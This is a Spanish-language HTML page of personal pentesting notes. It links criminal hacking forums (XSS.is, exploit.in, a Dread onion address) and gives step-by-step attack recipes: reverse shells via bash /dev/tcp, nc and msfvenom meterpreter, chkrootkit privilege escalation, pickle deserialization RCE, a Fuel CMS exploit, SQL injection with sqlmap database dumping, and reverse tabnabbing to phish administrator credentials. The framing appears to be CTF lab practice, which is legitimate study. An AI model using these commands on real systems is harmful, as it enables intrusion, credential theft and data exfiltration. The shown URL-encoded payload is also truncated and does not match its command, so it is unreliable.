<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Exploits y Fuentes</title>
  <link rel="icon" href="/images/terminal.png" type="image/png">
  <style>
    :root {
      --brick-fire: #B22222;
      --fondo-negro: #121212;
      --texto-principal: #e0dcdc;
      --texto-secundario: #b5a6a6;
      --gris-oscuro: #2a2a2a;
    }

    body {
      background-color: var(--fondo-negro);
      color: var(--texto-principal);
      font-family: 'Georgia', serif;
      margin: 20 px;
      padding: 3rem 1rem;
      line-height: 1.9;
      font-size: 1.18rem;
      max-width: 800px;
      margin-left: auto;
      margin-right: auto;
    }

    h1, h2, h3, h4 {
      color: var(--brick-fire);
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      margin-bottom: 1rem;
      white-space: normal;
      overflow-wrap: break-word;
      line-height: 1.3;
    }

    h1 {
      font-size: 2.8rem;
      margin-top: 0;
      border-bottom: 3px solid var(--brick-fire);
      padding-bottom: 0.3rem;
    }

    h2 {
      font-size: 2rem;
      margin-top: 3rem;
      border-bottom: 1.5px solid var(--brick-fire);
      padding-bottom: 0.25rem;
    }

    h3 {
      font-size: 1.6rem;
      margin-top: 2.5rem;
      border-bottom: 1.5px solid var(--brick-fire);
      padding-bottom: 0.2rem;
    }

    h4 {
      font-size: 1.4rem;
      margin-top: 2rem;
      border-bottom: 1px solid var(--brick-fire);
      padding-bottom: 0.2rem;
    }

   p {
  margin: 20px; 
  text-align: justify;
  text-justify: inter-word;
    padding: 10px;
}


    img {
      max-width: 100%;
      border-radius: 12px;
      box-shadow: 0 0 15px var(--brick-fire);
      margin: 2rem auto;
      display: block;
      height: auto;
    }

    blockquote {
      border-left: 5px solid var(--brick-fire);
      padding-left: 1rem;
      color: var(--texto-secundario);
      font-style: italic;
      margin: 2rem 0;
      background-color: var(--gris-oscuro);
      border-radius: 8px;
    }

    a {
      color: var(--brick-fire);
      text-decoration: none;
      border-bottom: 1px dashed var(--brick-fire);
      transition: all 0.3s ease;
    }

    a:hover {
      color: #db5858;
      border-bottom: 1px solid #db5858;
    }

    header, footer {
      text-align: center;
      color: var(--brick-fire);
      margin-bottom: 3rem;
      font-weight: 600;
      letter-spacing: 1px;
    }

    footer {
      margin-top: 5rem;
      font-size: 0.9rem;
    }

    @media (max-width: 600px) {
      body {
        padding: 2rem 1rem;
        font-size: 1rem;
      }

      h1 {
        font-size: 2rem;
      }

      h2 {
        font-size: 1.5rem;
      }

      h3 {
        font-size: 1.3rem;
      }

      h4 {
        font-size: 1.1rem;
      }
    }
	code {
letter-spacing: -0.5px; /* Reduce el espacio entre las letras */
  word-spacing: -1px; /* Reduce el espacio entre las palabras */
  line-height: 1.2
  font-size: 23px;
  color: #FFD700	
	
}
  </style>
</head>
<body>

	<header>
    <h1>Exploits y Fuentes</h1>
  </header>
  <section>

<h2>Repositorios</h2>
 <ul>
 <li><a href="https://github.com/pentestmonkey/php-reverse-shell" target="_blank">PHP Reverse Shell</a></li>
<li><a href="https://github.com/The-Z-Labs/linux-exploit-suggester" target="_blank">Linux Exploit Suggester</a></li>
</ul>

	<h2>Paginas</h2>
    <ul>
      <li><a href="https://gchq.github.io/CyberChef/" target="_blank">CyberChef</a></li>
      <li><a href="https://pentestmonkey.net" target="_blank">pentestmonkey</a></li>
      <li><a href="https://gtfobins.github.io/" target="_blank">GTFOBins</a></li>
      <li><a href="https://github.com/OlivierProTips" target="_blank">OlivierProTips</a></li>
      <li><a href="https://www.dcode.fr/es" target="_blank">dCode</a></li>
      <li><a href="https://www.md5online.org" target="_blank">MD5 Online</a></li>
    </ul>

    <h2>Máquinas Vulnerables</h2>
    <ul>
      <li><a href="https://overthewire.org" target="_blank">OverTheWire: Wargames</a></li>
      <li><a href="https://hackmyvm.eu/" target="_blank">Hack My VM</a></li>
      <li><a href="https://dockerlabs.es/" target="_blank">Docker Labs</a></li>
      <li><a href="https://thehackerslabs.com/" target="_blank">The Hacker Labs</a></li>
      <li><a href="https://tryhackme.com/" target="_blank">Try Hack Me</a></li>
      <li><a href="https://hackthebox.com/" target="_blank">Hack The Box</a></li>
      <li><a href="https://www.root-me.org/" target="_blank">Root Me</a></li>
      <li><a href="https://www.vulnhub.com/" target="_blank">VulnHub</a></li>
	<li><a href="https://infosecmachines.io/" target=_blank">Info Sec Machines</a></li>
    </ul>

    <h2>Foros</h2>
    <ul>
      <li><a href="https://hackforums.net/" target="_blank">Hack Forums</a></li>
      <li><a href="https://xss.is/" target="_blank">XSS.IS</a></li>
      <li><a href="https://exploit.in/" target="_blank">exploit.in</a></li>
      <li><a href="dreadytognbh7m5nlmqsogzzlxjy75iuxkulewbhxcorupbqahact2yd.onion" target="_blank">Dread (requiere Tor)</a></li>
    </ul>

  </section>


  <article>

    <h2>Shell reversa con php en wp-admin</h2>

    <p>
        Al iniciar sesion en wp-admin, si hay acceso a la seccion Appearance y hay codigo php, se puede pegar codigo de 
        un php para conseguir una shell reversa.
    </p>

     <h2>Nombre personalizado de un dominio en una ip</h2>

    <p>
      Al entrar a una ip, y aparece con un nombre de dominio <code>http://vtcsec</code> y 
      no permite acceder, se soluciona de la siguiente manera.
      Ejecute <code>sudo nano /etc/hosts</code> para acceder al dominio, una vez dentro coloque la ip y el nombre que aparece 
      <code>10.2.168.99	  vtcsec</code>, guardalo y ya se puede acceder al sitio. 
    </p>

    <h2>chkrootkit 0.49</h2>

    <p>Para explotar este chkrootkit desactualizado debemos estar en <code>"/tmp"</code>, luego ejecutar 
      <code> echo "/bin/bash" > /tmp/update </code>, luego <code> echo "chmod +s /bin/bash" >> /tmp/update </code>, y finalmente <code> /bin/bash -p </code>. Con esta serie de comandos
    crea un archivo <code>/tmp/update</code> que, al ejecutarse, establece el setuid en <code>/bin/bash</code> lo que permite 
    ejecutar bash con privilegios elevados y luego ejecuta <code>/bin/bash -p</code> como usuario root.
    </p>

    <h2>Payload php inverso con metasploit y msfvenom a una pagina con metodo HTTP PUT</h2>

    <p>Para verificar si podemos aprovechar y ejecutar este truco, usamos <code>curl -v -X OPTIONS (ip o url)</code>, si acepta metodo PUT, 
      es un buen comienzo. Al tener un servidor con metodo HTTP PUT, se pueden subir archivos con <code>curl -T archivo 
      (ip/ruta/archivo) --http1.0</code>, podemos aprovechar esta vulnerabilidad para subir una shell inversa. 
      <br>Para crear la shell y subirlo a la maquina victima usamos <code>sudo msfvenom -p php/meterpreter_reverse_tcp LHOST=(ip atacante) 
      LPORT=(funciona mejor con el 443) -f raw > archivo</code>. 
      Una vez creado el archivo, ejecutamos metasploit y usamos el <code>exploit/multi/handler</code> y seleccionamos el payload 
      <code>payload/php/meterpreter_reverse_tcp</code>, lo configuramos con nuestra ip atacante y el puerto que hayamos elejido, despues corremos 
      el exploit y ejecutamos la shell que subimos al servidor.
    </p>

    <h2>
      Shell reversa a traves de un sitio web con php inseguro
    </h2>
    <p>
      Si nos encontramos en una situacion como esta <code> http://10.10.10.10/site/busque.php?buscar= [comando] </code>, donde un php permite ejecutar comandos del sistema, podemos aprovechar esto para generar una shell reversa, <code> /bin/bash -c 'bash -i >& /dev/tcp/ip atacante/puerto 0>&1' </code>, 
      este comando debemos colocarlo donde el php nos permite enviar codigo, probablemente tengamos que codificarlo en URL por lo que deberia quedar asi <code> E10%2F443%200%3E%261%27 </code>. <br>Una vez codificado debemos usar dos terminales de la maquina atacante, en una colocamos un 
      <code> nc -lvnp [puerto que hayamos elejido]</code>, y ejecutar en la otra el comando <code> curl "http://10.10.10.10/site/busque.php?buscar=E10%2F443%200%3E%261%27" </code>, finalmente volvemos a la terminal del netcat y ya acabaremos dentro de la maquina.

    </p>

	<h2>Tabnabbing inverso</h2>

	<p>
	Si en una pagina nos encontramos con el parametro <code> target="_blank" </code>, se puede explotar usando una replica de la pagina de inicio de sesión, incitando al administrador a introducir sus credenciales cuando haga clic en nuestro enlace, lo que debe contener es este script:
	<a href="tabnabbing.txt" target="_blank">Exploit Tabnabbing</a>. Una vez creado el script debemos guardarlo como html, y en el directorio donde tengamos el script en html y la pagina de login, abrimos un <code>python3 http.server 80</code>, en otro lado un 
  <code>nc -lvnp [puerto del script]</code> y a esperar a que la victima ponga sus credenciales.	
	</p>
	

	<h2>Exploit Fuel CMS 1.4.1</h2>

	<p>Si en un servidor nos encontramos con un login asi <code>http://IP/structure/index.php/fuel/login/</code> podemos usar un script que inyecta una shell reversa al ejecutarlo <a href="fuelCMS1.4.1.txt" target="_blank">Exploit Fuel CMS 1.4.1</a>. Lo ejecutas asi <code>python3 exploit.py</code>. 
    Con esto conseguimos un acceso de comandos remoto. Y podriamos generar una reverse shell por ej <code>nc -c sh IP 4444</code> y en otra consola ponemos un <code>nc -lvnp 4444</code></p>
    
	<h2>Aplicacion web python hecha con Pickle </h2>
	<p>Si en una maquina nos encontramos con esto: <a href="pickle1.txt" target="_blank">Ejemplo</a>, es un script que recibe datos, los decodifica y los ejecuta como código. Podemos aprovecharlo creando esto: <a href="pickle2.txt" target="_blank">Exploit Pickle</a>, en el exploit hay que colocar una 
    bash reversa con nuestra ip y un puerto, cuando lo ejecutemos con <code>python3 exploit.py</code> nos devolvera algo asi <code>b'gASVRgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtl'</code>, copiamos lo que esta dentro de las comillas, pero antes revisemos que puerto maneja la app con <code>netstat -tulpn</code>, 
    en este caso el 5000, y recordemos la ruta del endpoint de la app del primer ejemplo <code>/heaven</code> y el parámetro que recibe el servidor por post <code>awesome</code>. Despues tenemos que tener una consola con un <code>nc -lvnp 4444</code> y, en la maquina victima ponemos con el codigo que nos 
    paso el exploit lo siguiente: <code>curl -d "awesome=gASVRgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtl" -X POST http://127.0.0.1:5000/heaven</code>. Una vez ejecutamos el comando, el nc nos dará acceso a la maquina victima como root.</p>

    <h2>CMS Coldfusion</h2>
    <p>Si en un servidor corre ColdFusion, este CMS (Content Management System) permite inyecciones de codigo como SQL, en especial si tiene versiones desactualizadas, un punto de arranque es el siguiente directorio <code>http://IP/CFIDE/Administrator/</code>, donde se puede alojar un <code>login.php</code>
    . Una vez en la pagina de login, ejecutemos Burp Suite, vamos a Proxy -> Intercept -> Open Browser y nos dirigimos al directorio mencionado. Podemos hacer una inyeccion SQL en el apartado de contraseña <code>' OR '1'='1</code>, una vez logueado, volvemos a Burp Suite -> HTTP History -> Request, seleccionamos toda la request
  y la guardamos como <code>testing.sql</code>, despues en una consola ejecutamos <code>sqlmap -r testing.sql --dbs</code>, al recibir las base de datos podemos hacer esto, <code>sqlmap -r testing.sql -D BaseDeDatos --dump-all</code> con esto podremos encontrar informacion importante.</p>

    <h2>
      Directorios de interes
    </h2>
    <p>
      /etc/crontab [se pueden ver que tareas se ejecutan en el sistema periodicamente]
      <br>/var/www/html [se suele alojar un servicio web]
      <br>/var/spool/cron/crontabs/ [archivos cron por usuario]
      <br>/etc/cron.d/ [archivos cron adicionales definidos por el administrador]
      <br>/etc/cron.daily/, /etc/cron.hourly/, /etc/cron.weekly/, /etc/cron.monthly/ [directorios con scripts para ejecutar tareas en intervalos específicos]
      <br>/etc/cron.allow y /etc/cron.deny [archivos para controlar el acceso a cron]
      <br>/etc/anacrontab [tareas periódicas para sistemas que no están siempre encendidos]
      <br>/usr/lib/python3.9/ [es una ruta en tu sistema Linux donde se encuentran los archivos esenciales de la instalación de Python 3.9. 
      Contiene las bibliotecas y módulos que Python necesita para funcionar correctamente en el sistema, así como las dependencias necesarias para su ejecución]
    </p>
  </article>

  